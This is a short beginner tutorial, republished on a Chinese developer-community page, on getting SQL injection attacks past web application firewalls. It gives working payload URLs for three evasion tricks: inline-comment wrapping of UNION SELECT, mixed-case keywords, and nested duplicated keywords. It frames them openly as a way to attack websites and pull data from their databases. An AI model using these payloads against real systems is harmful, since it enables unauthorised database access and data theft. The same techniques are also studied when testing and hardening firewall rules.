SQL Injection Part 5 – Bypassing WAF-阿里云开发者社区

开发者社区> 数据库> 正文
登录阅读全文

SQL Injection Part 5 – Bypassing WAF

简介:   In my previous posts, i have explained about different types of SQL injections.
 
In my previous posts, i have explained about different types of SQL injections. Some times, when we try to retrieve data from SQLi vulnerable websites, we end up with forbidden error. Today i will explain why you get such errors and  how you can  bypass such errors and perform successful attacks on websites. If you have not read my previous posts and if you are new to SQLi, I would suggest you to read them before proceeding.


You can read them from here.

What is WAF?
WAF stands for Web Application Firewall. In order to prevent the attacks such as SQLi and XSS, administrators put Web Application Firewalls. These WAFs detect malicious attempts with the use of signature based filters and escapes defined within a list of rules. As a result of this design, they are vulnerable and can be easily bypassed.

How it works??
When the WAF detects malicious attempts, our input URL gives a forbidden error as shown in the following figure.


Our aim is to bypass this error and need to retrieve data from the database using some special techniques. There are many methods to bypass WAF. In this tutorial, i am going to show you some basic methods. These methods are especially for beginners.


Methods To Bypass WAF
Comments :-
Comments allow us to bypass a lot of the restrictions of Web application firewalls and to kill certain SQL statements to execute the attackers commands while commenting out the actual legitimate query.

Actual query
http://vulnerablesite.com/detail.php?id=44 union all select 1,2,3,4,5—

Query To  Bypass the WAF
http://vulnerablesite.com/detailphp?id=44 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5—


Capitalization Of Functions:-
Some WAF’s will filter only lowercase alphabets, So we can easily evade this by case changing.

Actual query
http://vulnerablesite.com/detail.php?id=44 UNION SELECT 1,2,3,4,5—
Query to  bypass the WAF
http://vulnerablesite.com/detail.php?id=-1 uNiOn SeLeCt 1,2,3,4,5—

Replaced Keywords:-
Some WAF's will escape certain keywords such as UNION, SELECT, ORDER BY, etc. This can be used to our advantage by duplicating the detected word within another.

Actual query
http://vulnerablesite.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5—
Query to  bypass the WAF
http://vulnerablesite.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5--


Hope you liked this article. Feel free to leave your comments for further doubts and clarifications.


Read more: http://www.101hacker.com/2011/11/sql-injections-part-5-bypassing-waf.html#ixzz1lawTrV8h

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

分享:
数据库
使用钉钉扫一扫加入圈子
+ 订阅

分享数据库前沿,解构实战干货,推动数据库技术变革

其他文章